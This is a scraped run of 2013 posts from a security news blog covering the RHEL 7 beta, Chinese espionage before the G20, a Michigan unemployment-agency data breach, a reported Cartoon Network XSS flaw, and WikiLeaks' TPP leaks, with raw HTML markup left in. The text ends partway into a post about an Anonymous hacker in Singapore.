The beta release of Red Hat Enterprise Linux 7 adds value to new and existing IT projects across industries by adding key capabilities to improve critical but often cumbersome IT tasks like <a href="http://www.voiceofgreyhat.com/search?q=virtualization">virtualization</a> and storage while offering a clear pathway to the <a href="http://www.voiceofgreyhat.com/search?q=hybrid+cloud">open hybrid cloud</a>. </span>On its official Red Hat Enterprise Linux YouTube channel, Red Hat has posted a short video where you can hear what the team at Red Hat has to say about the next generation of the world’s leading Linux platform.</div>
<div style="text-align: justify;">
<span class="embed-youtube" style="display: block; text-align: center;"><iframe class="youtube-player" frameborder="0" height="359" src="http://www.youtube.com/embed/3dUO_JVxvi0?version=3&rel=1&fs=1&showsearch=0&showinfo=1&iv_load_policy=1&wmode=transparent" type="text/html" width="584"></iframe></span><br />
<span style="font-family: inherit;">Red Hat Enterprise Linux 7 Beta showcases hundreds of new features and enhancements, including: </span></div>
<div style="text-align: justify;">
<ul style="background-color: white; border: 0px; line-height: 24px; list-style: square; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Linux Containers</strong><b> </b>- Enabling applications to be created and deployed in isolated environments with allocated resources and permissions.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Performance Management</strong> – Using built in tools, you can optimize performance out-of-the-box.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Physical and Hosted In-place Upgrades </strong>- In-place upgrades for common server deployment types are now supported. Additionally, virtual machine migration from a Red Hat Enterprise Linux 6 host to a Red Hat Enterprise Linux 7 host is possible, without virtual machine modification or downtime.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><div style="text-align: justify;">
<strong style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">File Systems</strong><span style="font-family: inherit; font-style: inherit; font-weight: inherit;"> </span><span style="font-family: inherit; font-style: inherit; font-weight: inherit;">– File systems continue to be a major focus of development and innovation.</span></div>
<ul style="border: 0px; font-style: inherit; font-weight: inherit; list-style: square; margin: 0px 0px 0px 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">XFS is now the default file system, supporting file systems up to 500TB</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">ext4 file systems are now supported to 50TB and include block sizes up to 1MB</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">btrfs file systems are now available to test</span></li>
</ul>
</li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><div style="text-align: justify;">
<strong style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Networking</strong><span style="font-family: inherit; font-style: inherit; font-weight: inherit;"> </span><span style="font-family: inherit; font-style: inherit; font-weight: inherit;">– Enhanced networking configuration and operation. Added support for some of the latest networking standards, including:</span></div>
<ul style="border: 0px; font-style: inherit; font-weight: inherit; list-style: square; margin: 0px 0px 0px 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">40Gb Ethernet support</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">Improved channel bonding</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">TCP performance improvements</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">Low latency socket poll support</span></li>
</ul>
</li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Storage</strong> – Expanded support for enterprise level storage arrays. Improved scalable storage stack for deployments that are less disk intensive. Improved storage management for heterogeneous storage environments.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Windows Interoperability</strong> – Bridge Windows™ and Linux infrastructure by integrating SAMBA 4.1 with existing Microsoft Active Directory domains. Or, deploy Red Hat Enterprise Linux Identity Management in a parallel trust zone with Active Directory.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Subsystem Management</strong> – Simplified configuration and administration with uniform management tools for networking, storage, file systems, performance, identities and security. Leveraging the OpenLMI framework enables use of scripts and APIs to automate management.</span></li>
</ul>
<div>
<span style="line-height: 24px;">To learn more about the new features and enhancements of RHEL 7 beta 1, click <a href="https://access.redhat.com/site/sites/default/files/pages/attachments/rhel_whatsnewrhel7beta_techoverview_.pdf">here</a>. </span><span style="line-height: 24px;">I am quite sure that, after going through the above description, all of you are excited to grab this brand new beta of RHEL 7. As with the previous beta release, this time too the Red Hat Enterprise Linux 7 beta has been made </span><span style="line-height: 24px;">available</span><span style="line-height: 24px;"> to Red Hat customers, partners, and members of the public. For further information and to access the beta click </span><a href="https://access.redhat.com/site/products/Red_Hat_Enterprise_Linux/Get-Beta" style="line-height: 24px;">here</a><span style="line-height: 24px;">. Last but not least, with this release Red Hat has also announced a very interesting competition, where you can participate & <a href="https://www.techvalidate.com/registration/Red-Hat-Enterprise-Linux-7-Beta">win $500 while telling Red Hat what interests you most</a> in RHEL 7 beta. So what are you waiting for? Let's <b><a href="http://ftp.redhat.com/redhat/rhel/beta/7/x86_64/iso/rhel-everything-7.0-beta-1-x86_64-dvd.iso">download RHEL 7</a></b> and explore it. </span><br />
<span style="line-height: 24px;"><br /></span></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-84493422887326752412013-12-13T01:23:00.000+05:302013-12-13T01:23:42.130+05:30Chinese Hackers Eavesdropping European Diplomats Before G20 Summit <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin: 0in 0in 0.0001pt; text-align: center;">
<span style="font-size: large;">Researchers<span style="background-color: white;"> At <b>FireEye</b> Found -</span><span style="text-align: left;"><b>Chinese Hackers</b> </span><span style="text-align: left;"><i><span style="color: red;"><b>Snitching</b></span></i> </span> Europeans Before <b>G20 Summit</b></span><span style="font-size: medium;"><b> </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQJnPaOSBcjY3Kzln33MNl9h5ryJpFUVaYv7NjfatjEnc_vV8JiqlrIL-ryr8G1ndE7BXnHltkUv3pQ86UluynGJ-NoQNO5yGg5k_AQgqKkDs5-DF0mGX8gcENvAoTgLURtxpnE2qVhA/s1600/chinese-hackers-eavesdropping-europeans-before-G20-summit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQJnPaOSBcjY3Kzln33MNl9h5ryJpFUVaYv7NjfatjEnc_vV8JiqlrIL-ryr8G1ndE7BXnHltkUv3pQ86UluynGJ-NoQNO5yGg5k_AQgqKkDs5-DF0mGX8gcENvAoTgLURtxpnE2qVhA/s400/chinese-hackers-eavesdropping-europeans-before-G20-summit.jpg" width="400" /></a></div>
<span style="font-family: inherit;"><span style="background-color: white; text-align: justify;">Stories of </span><span style="text-align: justify;"><a href="http://www.voiceofgreyhat.com/search?q=cyber+espionage" style="outline: none;"><span style="background: white; text-decoration: none; text-underline: none;">cyber espionage</span></a><span style="background: white;"> by <b><a href="http://www.voiceofgreyhat.com/search?q=china&max-results=20&by-date=true" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Chinese hackers</span></a></b> have
long remained among the hottest topics in the news. </span>Yet
another breathtaking case of <a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a> by Chinese hackers
has come into the <a href="http://www.reuters.com/article/2013/12/10/us-china-hacking-g-idUSBRE9B817C20131210">spotlight</a>: the renowned California-based computer
security firm <a href="http://www.fireeye.com/">FireEye Inc</a>, which sells <a href="http://www.voiceofgreyhat.com/search?q=virus">virus</a> fighting technology
to companies, has found that a group of <a href="http://www.voiceofgreyhat.com/search?q=Chinese+hackers">Chinese hackers</a> eavesdropped on the computers of five European foreign ministries
before last September's G20 Summit, which was dominated by the Syrian crisis.
According to the detailed analysis, the hackers
infiltrated the ministries' computer networks by sending emails to
staff containing tainted files with titles such as
<b>"US_military_options_in_Syria."</b> Whenever the targeted recipients opened those documents,
they loaded <a href="http://www.voiceofgreyhat.com/search?q=malicious">malicious code</a> onto their personal computers. <a href="http://www.voiceofgreyhat.com/search?q=researchers">Researchers</a> at
FireEye said that they were able to monitor the "inner workings"
of the main computer server used by the hackers to conduct their reconnaissance
and move across compromised systems for about a week in late August. But
they suddenly lost access to the hackers after they moved to another server
shortly before the G20 Summit in St. Petersburg, <a href="http://www.voiceofgreyhat.com/search?q=Russia">Russia</a>. </span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBB6xrZSBR4I_FRiCc3aNRAW3Qv9L240p7rLeHp0TmO_S4d9XhydqgshZnN1CdV700pGKReLd3lewxsNulMdpDQ3nf-e87ei3O45EzshWvYVgt7hTbd4BWDn_-6GwbrT3hqEJWn8VOBT4/s1600/G20-summit.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBB6xrZSBR4I_FRiCc3aNRAW3Qv9L240p7rLeHp0TmO_S4d9XhydqgshZnN1CdV700pGKReLd3lewxsNulMdpDQ3nf-e87ei3O45EzshWvYVgt7hTbd4BWDn_-6GwbrT3hqEJWn8VOBT4/s320/G20-summit.jpg" width="320" /></a></span></div>
<span style="font-family: inherit; text-align: justify;">The company has
declined to publicly identify the nations whose ministries were hacked,
although it said they were all members of the European Union. FireEye did, however,
inform the </span><a href="http://www.voiceofgreyhat.com/search?q=FBI" style="font-family: inherit; text-align: justify;">FBI</a><span style="font-family: inherit; text-align: justify;"> about the whole issue in detail. </span><a href="http://www.voiceofgreyhat.com/search?q=FireEye" style="font-family: inherit; text-align: justify;">FireEye</a><span style="font-family: inherit; text-align: justify;"> also confirmed
that the hackers were from China, but it did not find evidence that would
link those hackers to the </span><a href="http://www.voiceofgreyhat.com/search?q=Chinese+government" style="font-family: inherit; text-align: justify;">Chinese government</a><span style="font-family: inherit; text-align: justify;">. Unsurprisingly,
as before, the Chinese government has distanced itself from any claim that it
might have hacked foreign governments for data. FireEye also
monitors several dozen hacking groups operating in China, most of which it
suspects of having ties to the government. The firm also suspects the hacking
groups of stealing intellectual property for commercial gain.
The </span><a href="http://www.voiceofgreyhat.com/search?q=researchers" style="font-family: inherit; text-align: justify;">researchers</a><span style="font-family: inherit; text-align: justify;"> </span><span style="background-color: white; background-position: initial initial; background-repeat: initial initial; font-family: inherit; text-align: justify;">had
been following the hackers behind the Syria-related attack for several years,
but this is the first time the group's activities have been publicly
documented. The company calls the group <b>"Ke3chang," </b>after the name of
one of the files it uses in one of its pieces of malicious <span class="mandelbrotrefrag">software</span>. </span><span style="font-family: inherit; text-align: justify;">"</span><i style="font-family: inherit; text-align: justify;">The
theme of the attacks was U.S. military intervention in Syria,"</i><span style="font-family: inherit; text-align: justify;"> said
FireEye researcher Nart Villeneuve. </span><br />
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">In
response, Chinese Foreign Ministry spokesman Hong Lei said: <i>"U.S.
internet companies are keen on hyping up the so-called hacker threat from
China, but they never obtain irrefutable proof, and what so-called evidence
they do get is widely doubted by experts. This is neither professional nor
responsible," </i></span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">While
on this story of <a href="http://www.voiceofgreyhat.com/search?q=Chinese+eavesdropping">Chinese eavesdropping</a>, I also want to recall some
points from the recent past, in which we have all become used to seeing <a href="http://www.voiceofgreyhat.com/search?q=Europe">Europe</a>
& <a href="http://www.voiceofgreyhat.com/search?q=US">U.S. countries</a> <a href="http://www.voiceofgreyhat.com/2013/03/WhiteHouse-Calls-China-to-Stop-Hacking.html">blaming China</a> for engaging in <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a>, and China
<a href="http://www.voiceofgreyhat.com/2013/03/Chinese-defnese-attacked-by-us-hackers.html">doing the same</a> by accusing the U.S. in turn. To revive your memories
of the last few years: <span style="background: white;">if you look at the
story of major <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a> of <a href="http://www.voiceofgreyhat.com/2013/">this year</a>, you will find that the name of China
has been involved</span> several times in cyber attacks
against several high-profile websites and organizations of the U.S.,
including <a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">New
York Times</span></a>, <a href="http://www.voiceofgreyhat.com/2013/02/Twitter-Hacked-250000-User-Data-Compromised.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Twitter</span></a>, <a href="http://www.voiceofgreyhat.com/2013/02/NBC.com-Compromised.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">NBC</span></a> and
so on. And if we refresh our memory further, we will find that
big cyber attacks and espionage by Chinese
hackers have been <a href="http://www.voiceofgreyhat.com/2012/10/White-House-Unclassified-Network-Hacked-By-Chinese-Hackers.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">spotted
several times</span></a>. In <a href="http://www.voiceofgreyhat.com/2012/">2012</a> Chinese hackers <a href="http://www.voiceofgreyhat.com/2012/09/Chinese-Hackers-Gained-Control-of-US-Power-Grid.html" style="outline: none;">breached</a> Telvent's corporate network &
gained control of <a href="http://www.voiceofgreyhat.com/search?q=power%20grid" style="outline: none;">US
Power Grid</a>. Also, in the middle of last year, we saw that <a href="http://www.voiceofgreyhat.com/search?q=China" style="outline: none;">Chinese
hackers</a> had broken into <a href="http://www.voiceofgreyhat.com/2012/07/chinese-hackers-broke-into-indian-navys.html" style="outline: none;">Indian Navy's Computer System</a> & stolen
sensitive data. A few months before this hack, Tokyo-based
computer security firm <a href="http://trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf" style="outline: none;">Trend Micro</a> confirmed that Chinese hackers were responsible
for the biggest <a href="http://www.voiceofgreyhat.com/2012/04/chinese-hackers-were-responsible-for.html" style="outline: none;">cyber-espionage</a> in India, Japan & Tibet.
The director of the <a href="http://www.voiceofgreyhat.com/search?q=NSA" style="outline: none;"><b>National
Security Agency (NSA)</b></a>, General Keith Alexander, also confirmed that
hackers from China were responsible for the serious attack on one of the leading
IT security & cyber security companies, <a href="http://www.voiceofgreyhat.com/search?q=RSA" style="outline: none;"><b>RSA</b></a>. Also
in 2011 <a href="http://www.voiceofgreyhat.com/search?q=China" style="outline: none;">China</a> was behind the attacks on <a href="http://www.voiceofgreyhat.com/2011/12/us-chamber-of-commerce-under-massive.html" style="outline: none;">US Chamber of Commerce</a>, <a href="http://www.voiceofgreyhat.com/2011/10/satellite-system-of-us-was-attacked-by.html" style="outline: none;">Satellite System of U.S</a>, <a href="http://www.voiceofgreyhat.com/2012/02/nortel-network-breached-by-chinese.html" style="outline: none;">Nortel Network</a> & so on. But a few days
ago the National Computer Network Emergency Response Coordination Center of China
(CNCERT/CC), China's primary computer security monitoring network, claimed that
China had fallen victim to one of the <a href="http://www.voiceofgreyhat.com/2012/03/china-claimed-to-be-biggest-victim-of.html" style="outline: none;">biggest cyber attacks</a>, originating from <a href="http://www.voiceofgreyhat.com/search?q=US">US</a>, <a href="http://www.voiceofgreyhat.com/search?q=Japan">Japan</a>
& <a href="http://www.voiceofgreyhat.com/search?q=South+Korea">South Korea</a>. We must say that this statement is truly irrelevant. <a href="http://www.voiceofgreyhat.com/search/label/cyber-crime" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Cyber crime</span></a> investigators
have found that China was directly responsible for the hacks into Japan's <a href="http://www.voiceofgreyhat.com/2011/09/japans-biggest-defense-contractor.html" style="outline: none;">Biggest Defense Contractor Mitsubishi</a>, <a href="http://www.voiceofgreyhat.com/2012/01/hackers-have-stolen-data-from-japan.html" style="outline: none;">Japan Aerospace Exploration Agency (JAXA)</a> & <a href="http://www.voiceofgreyhat.com/2011/10/parliament-of-japan-under-cyber-attack.html" style="outline: none;">Parliament of Japan</a>. In the case of South Korea,
the data of more than <a href="http://www.voiceofgreyhat.com/2011/11/south-korea-under-massive-cyber-attack.html" style="outline: none;">13 Million MapleStory players</a> was
stolen, and there too hackers from China were responsible. </span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">Before I conclude, I ask you to look closely at the above-mentioned stories; you will find <a href="http://www.voiceofgreyhat.com/search?q=China">China</a> largely responsible for <a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a> & <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breaches</a>. At the same time, China has also been affected in the same way. So in <span style="text-align: left;">conclusion, we can't put a full stop to this chain of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a>, <a href="http://www.voiceofgreyhat.com/search?q=hacking">hacking</a> & </span><a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a>, as it comes from both ends. So this episode will continue as it has. If you want to stay updated, don't forget to stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-66596261162877501392013-12-13T01:22:00.001+05:302013-12-13T01:22:02.552+05:30Security Breach Invaded 8,500 Recipients of Unemployment Insurance Agency Michigan (UIA) <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">Michigan <b>Unemployment Insurance Agency (UIA)</b> <i><span style="color: red;">Hacked</span>!</i> <b>8,500 Recipients</b> <span style="color: red;">Personal Data Leaked</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7SoMZrXjuKvjF0-NEmMVGn2QZcGhaujJB9O8917BFrperBUfl3n6wDFPnjNY1mZk1_k3UF0IZd60zUnKztKLHbDZduXLKIdSWtvi9P7_mXkvhEoduFzzzz4988bIRxxHDbtT4j_-UVVk/s1600/unemployment-insurance-agency-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7SoMZrXjuKvjF0-NEmMVGn2QZcGhaujJB9O8917BFrperBUfl3n6wDFPnjNY1mZk1_k3UF0IZd60zUnKztKLHbDZduXLKIdSWtvi9P7_mXkvhEoduFzzzz4988bIRxxHDbtT4j_-UVVk/s400/unemployment-insurance-agency-hacked.jpg" width="400" /></a></div>
<div style="text-align: justify;">
A major <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> has hit the <b><a href="http://www.michigan.gov/uia%E2%80%8E">Unemployment Insurance Agency</a></b> of Michigan, widely known as <b>UIA</b>. <a href="http://www.freep.com/article/20131212/NEWS06/312120098/unemployment-security-breach-Michigan">Sources</a> revealed that the attack took place between mid-July and mid-September and affected more than <b>8,500 unemployment insurance recipients</b> in Michigan, with a <a href="http://www.voiceofgreyhat.com/search?q=leak">leak</a> of <span style="color: red;">social security numbers, bank account numbers, passwords, phone numbers</span> & a few other pieces of sensitive data. This <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> was first detected Sept. 17 by contractor JP Morgan Chase. In response, the director of the Unemployment Insurance Agency, Shaun Thomas, said: <i>“The UIA is deeply concerned about this incident.” </i>But for reasons not disclosed, state officials were not notified until the first week of this December. Dan Lohrmann, the state’s chief security officer in the Department of Technology, Management and Budget, said he has “worked closely with JP Morgan Chase to share our concern about the delayed notification and to ensure that the state receives immediate notice of future problems.” <i>“We work around the clock to keep citizen information and data protected, and I feel confident that everyone involved in this event understands the importance of protecting personal information.” </i>Chase, which handles the debit cards Michigan uses to pay unemployment insurance benefits to some recipients, said those who accessed the bank’s website between mid-July and mid-September may have been affected. The 8,500 claimants in Michigan are among about 465,000 cardholders nationwide who may have been affected, the bank said. 
So far the identity of the <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> & their reasons for this <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">attack</a> have not been determined, but Chase has notified <a href="http://www.voiceofgreyhat.com/search?q=law+enforcement">law enforcement</a>, and both the bank and the state will be notifying claimants whose information was potentially compromised. </div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54124948859520604442013-12-10T02:26:00.002+05:302013-12-10T02:26:22.217+05:30Cartoon Network (CN) Official Website is Vulnerable to XSS Attack <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">XSS Vulnerability</span></b> Found in <b>Cartoon Network's (CN)</b> Official Website By<b> Dr41DeY </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDEgn648KaI97puQzetCLliIU_VPuCItApLwwACqt4BhdwjkFRr6V9ez_i3Lcji9QDNgi-KktJw-b0Uf5ynUSq7lKskeDwoaW3shyphenhyphenOOUD3azkUsMZEqW4QHqpcy7d7hy81LqjehvMLMg/s1600/cartoonnetwork_vulnerable2-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDEgn648KaI97puQzetCLliIU_VPuCItApLwwACqt4BhdwjkFRr6V9ez_i3Lcji9QDNgi-KktJw-b0Uf5ynUSq7lKskeDwoaW3shyphenhyphenOOUD3azkUsMZEqW4QHqpcy7d7hy81LqjehvMLMg/s400/cartoonnetwork_vulnerable2-xss.png" width="400" /></a></div>
<div style="text-align: justify;">
After the successful breach of <a href="http://www.voiceofgreyhat.com/2013/12/DY365TV-satellite-channel-of-assam-hacked.html">'DY365 TV'</a>, the hacker going by the name of <b><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a></b> from Nigerian Cyber Army has targeted another <a href="http://www.voiceofgreyhat.com/search?q=TV+network">TV network</a>. Guess what, this time he caught an even bigger fish. Unlike a <a href="http://www.voiceofgreyhat.com/search/label/defacement">defacement</a> or <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a>, this time the hacker did something that can be called ethical, or categorized as <a href="http://www.voiceofgreyhat.com/search?q=white+hat">white-hat</a>. Okay, without dragging out the intro any longer, let's come directly to the story: the official website of <b><a href="http://www.cartoonnetwork.com/">Cartoon Network</a></b> is <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerable</a> to a cross-site scripting attack, also known as an <a href="http://www.voiceofgreyhat.com/search?q=XSS">XSS attack</a>. Cartoon Network, mostly known as CN, is the world's leader in broadcasting animated programming, ranging from action to animated comedy & many more. This satellite channel is the most preferred channel for children and teenagers between the ages of 7 to 5 all over the world. So it is quite indisputable that the official website of Cartoon Network (CN) is indeed a valuable website with a large amount of traffic every day. But it is unclear why CN, being such a big and popular brand name, made such a blunder as leaving an <a href="http://www.voiceofgreyhat.com/search?q=XSS+vulnerability">XSS vulnerability</a> in its official portal. 
Dr41DeY shared with <a href="http://www.voiceofgreyhat.com/">VOGH</a> that the <a href="http://www.cartoonnetwork.com/search/index.html?keywords="><b><span style="color: red;">search box</span></b></a> on the home page of CN has a non-persistent XSS vulnerability. The above screenshot was taken as proof of the story. I, on behalf of Team VOGH, have already contacted the CN authorities and alerted them to this issue. Hopefully they will take appropriate steps without any further delay. For updates on this story and also other hot cyber issues, just stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54413251462292372612013-12-10T02:26:00.001+05:302013-12-10T02:28:40.611+05:30WikiLeaks Revealed Two New Documents of Trans Pacific Partnership Agreement (TPP) <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">WikiLeaks</span> </b>Revealed <b>Two New Documents </b>of </span><span style="text-align: left;"><span style="font-size: large;">Confidential </span></span><i style="font-size: x-large;"><span style="color: red;">Trans Pacific Partnership Agreement (TPP)</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgxXnirS1RqKSIhvrjv0g8O0IwGiuhFqehpeA9nQuiRX2J7TjYNoBps7S5dhiIBCSrl_8YF0OlPkfcYwHKp3hiZIOPMcaTfcxDDe6jAk1wixXISSjV3ObcQbXnFh3gHgnP83hW0v7hqks/s1600/secreet-trans-pacific-partnership-agreement-tpp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgxXnirS1RqKSIhvrjv0g8O0IwGiuhFqehpeA9nQuiRX2J7TjYNoBps7S5dhiIBCSrl_8YF0OlPkfcYwHKp3hiZIOPMcaTfcxDDe6jAk1wixXISSjV3ObcQbXnFh3gHgnP83hW0v7hqks/s400/secreet-trans-pacific-partnership-agreement-tpp.png" width="341" /></a></div>
<div style="text-align: justify;">
Last <a href="http://www.voiceofgreyhat.com/2013/11/">month</a> <b><a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a></b> <a href="http://www.voiceofgreyhat.com/2013/11/wikiLeaks-uncovered-TPP-a-threat-for-internet.html">published</a> the draft of the secret <b><a href="http://www.voiceofgreyhat.com/search?q=TPP">Trans Pacific Partnership Agreement (TPP)</a></b>, uncovering the United States' covert international push for stronger intellectual property rights. Now, just a month later, <b>two more breathtaking documents of TPP </b>have been revealed by the <a href="http://www.voiceofgreyhat.com/search?q=Julian%20Assange">whistle blower</a>; they show the state of negotiations as the twelve TPP countries began supposedly final negotiations at a trade ministers’ meeting in Singapore this week. These leaks come at a particularly inconvenient time for negotiators, as they enter into their fourth day of talks in Singapore amid growing criticism. The talks are premised on secrecy, allowing countries to push for particular proposals without having to justify their positions publicly, but the continued pressure from WikiLeaks has brought unintended attention to the proceedings.</div>
<div style="text-align: justify;">
According to the official WikiLeaks release, one document describes deep divisions between the United States and other nations, and "great pressure" being exerted by the US negotiators to move other nations to their position. The other document lists, country-by-country, the many areas of disagreement remaining. It covers intellectual property and thirteen other chapters of the draft agreement. This suggests that the TPP negotiations can only be concluded if the Asia-Pacific countries back down on key national interest issues, otherwise the treaty will fail altogether. The two documents described above are dubbed <b><a href="http://wikileaks.org/IMG/pdf/tpp-salt-lake-extracts-.pdf">TPP Salt Lake Extracts</a></b> & <b><a href="http://wikileaks.org/IMG/pdf/tpp-salt-lake-positions.pdf">TPP Salt Lake Positions</a></b>. For additional information about this issue click <a href="http://wikileaks.org/Second-release-of-secret-Trans.html?update">Here</a>. For further updates on TPP and also other hot <a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a> stories & cyber issues, just stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-70865989628708202452013-12-08T01:14:00.002+05:302013-12-08T01:14:39.927+05:30Anonymous Hacker Denied Bail in Singapore, Accused For Hacking Prime Minister Website<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
